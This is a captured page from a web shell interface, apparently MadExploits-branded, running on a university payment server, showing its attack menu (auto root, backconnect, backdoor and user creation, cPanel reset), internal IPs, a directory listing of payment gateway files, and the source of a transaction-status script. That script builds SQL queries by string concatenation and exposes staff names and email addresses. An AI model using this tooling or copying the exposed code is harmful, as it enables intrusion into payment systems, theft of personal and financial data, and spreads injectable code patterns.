Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
[ HOME SHELL ]
Name
Size
Permission
Action
fees
[ DIR ]
drwxr-xr-x
fees-old
[ DIR ]
drwxr-xr-x
ldaplogin
[ DIR ]
drwxr-xr-x
studentsfee
[ DIR ]
drwxr-xr-x
FailedTRAN.php
4.52
KB
-rw-r--r--
ForgetPassword.php
3.09
KB
-rw-r--r--
GetHandleRES.php
11.12
KB
-rw-r--r--
StatusTRAN.php
4.89
KB
-rw-r--r--
donationmail.php
5.71
KB
-rw-r--r--
giveback.php
10.15
KB
-rw-r--r--
index.html
773
B
-rwxrwxrwx
info.php
33
B
-rw-r--r--
libraryfaq.html
16.56
KB
-rw-r--r--
misp.html
14.15
KB
-rw-r--r--
misptest.html
14.15
KB
-rw-r--r--
pay.php
2.46
KB
-rw-r--r--
paybilldesk.php
2.51
KB
-rw-r--r--
payhdfc.php
11.8
KB
-rw-r--r--
payhdfctest.php
8.42
KB
-rw-r--r--
pma.zip
6.17
MB
-rw-r--r--
policyterms.html
6.67
KB
-rw-r--r--
recounsiliation.php
5.52
KB
-rw-r--r--
studentsfee.tar
15.22
MB
-rw-r--r--
test.php
131
B
-rw-r--r--
vendor.php
10.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FailedTRAN.php
<?php include_once "database.php";?><HTML> <HEAD> <TITLE>Transaction Stuatus Page</TITLE> </HEAD> <BODY> <center> <?php echo "<b><br>"; $strMessage = isset($_GET['message']) ? $_GET['message'] : ''; $strMTRCKID = $_SESSION['trackid']; ?> <TABLE align="center" border="0" style='margin:0; padding-bottom:0' bgcolor='#f2f5fc'> <TR> <TD width="40%">Your Transaction Status</TD> <TD><?php $sql = "Select * from payment where id=".$strMTRCKID; $result = mysql_query($sql,$db_connection); if($payment=mysql_fetch_array($result)) {echo $payment[Status];}?></TD> </TR> <TR> <TD>Merchant Reference. No: </TD> <TD><?php echo $strMTRCKID;?></TD> </TR> <?php $sql = "Select * from payment where id=".$strMTRCKID; $result = mysql_query($sql,$db_connection); if($payment=mysql_fetch_array($result)) { $sqll = "Select * from user where Email = '".$payment[email]."'"; $rslt = mysql_query($sqll,$db_connection); $user=mysql_fetch_array($rslt); ?> <TR> <TD width="40%">UID</TD> <TD><?php echo $user['ID'];?></TD> </TR> <TR> <TD width="40%">Name</TD> <TD><?php echo $user['Name'];?></TD> </TR> <TR> <TD width="40%">Mobile</TD> <TD><?php echo $user['Mobile'];?></TD> </TR> <TR> <TD width="40%">Address</TD> <TD><?php echo $user['Adress'];?></TD> </TR> <TR> <TD width="40%">Amount</TD> <TD><?php echo $payment[Amount];?></TD> </TR> <TR> <TD width="40%">Remark</TD> <TD><?php echo $payment[remark];?></TD> </TR> <TR> <TD width="40%">Date</TD> <TD><?php echo substr($payment['date'],0,10);?></TD> </TR> <TR> <TD>Payment Status</TD> <TD><?php echo $payment[Status];?></TD> </TR> <tr><td colspan="2" align="center"><input type="button" value=" Print " onClick="window.print()"></td></tr> </table> </td> <td bgcolor='#f2f5fc' width='29'></td> </tr> <tr><td><?php $to=$user['Email'].", admin-accounts@iiitd.ac.in"; // Recipients email ID $name=$user['Name']; // Recipients name $from = "admin-accounts@iiitd.ac.in"; $subject = "[IIIT Delhi] - Payment".$payment[Status]; $message = "<html> <head> <meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body><table width='609' border='0' height='100%' cellpadding='0' cellspacing='0' align='center' style='margin:0; padding-bottom:0'> <tr style='margin:0; padding-bottom:0' bgcolor='#f2f5fc'> <td colspan='3' style='margin:0; padding-bottom:0' align='center'><img src='https://payments.iiitd.edu.in/pg/fees/logo.jpg' style='margin:0; padding-bottom:0'/></td> </tr> <tr> <td width='29' bgcolor='#f2f5fc'> </td> <td style='padding:10px 10px 10px 10px'> <font face='Verdana, Geneva, sans-serif' size='-1'> <br>Dear ".$user[Name]."<br/> User ID: ".$user[ID]." <br /> Transaction ID: ".$payment[id]." <br /> Amount: ".$payment[Amount]." <br /> Payment Status: ".$payment[Status]."<br /> Date: ".substr($payment['date'],0,10)."<br /> Remark : ".$payment[remark]." </td> <td bgcolor='#f2f5fc' width='29'> </td> </tr> <tr bgcolor='#f2f5fc'> <td colspan='3' bgcolor='#f2f5fc' align='center' >System Manager : Mr. Abir Bhatacharya | <a href='mailto:abir@iiitd.ac.in' target='_blank'>abir@iiitd.ac.in</a></td> </tr> </table></body></html></body></html>";//HTML Body $header = "From: " . $from . "\r\nReply-To: " . $from . "\r\n"; $header .= 'Cc: admin-accounts@iiitd.ac.in' . "\r\n"; $header .= 'Cc: karan4official@gmail.com' . "\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html; charset: utf8\r\n"; $header .= "Return-Path: admin-accounts@iiitd.ac.in\r\n"; $sentmail = mail($to,$subject,$message,$header); if(!$sentmail) { echo "Mailer Error: " . $mail->ErrorInfo(); echo "Unable to send mail"; } else { echo "Email for payment status is sent to ".$user[Email]."<br /> <p>If you don't receive an e-mail from us soon, please check your Junk and Spam folders; depending on your e-mail settings, automated e-mails can end up there.</p> <p>If you still haven't received the mail after 24 hours, please contact us at <a href='mailto:abir@iiitd.ac.in'>abir@iiitd.ac.in</a> (hours M-F 10:00 AM to 5:00 PM IST).</p>"; } }?></td></tr> <tr bgcolor='#f2f5fc'> <td colspan='3' bgcolor='#f2f5fc' align='center' >System Manager : Mr. Abir Bhatacharya | <a href='mailto:abir@iiitd.ac.in' target='_blank'>abir@iiitd.ac.in</a></td> </tr> </table> </div> </BODY> </HTML>
Close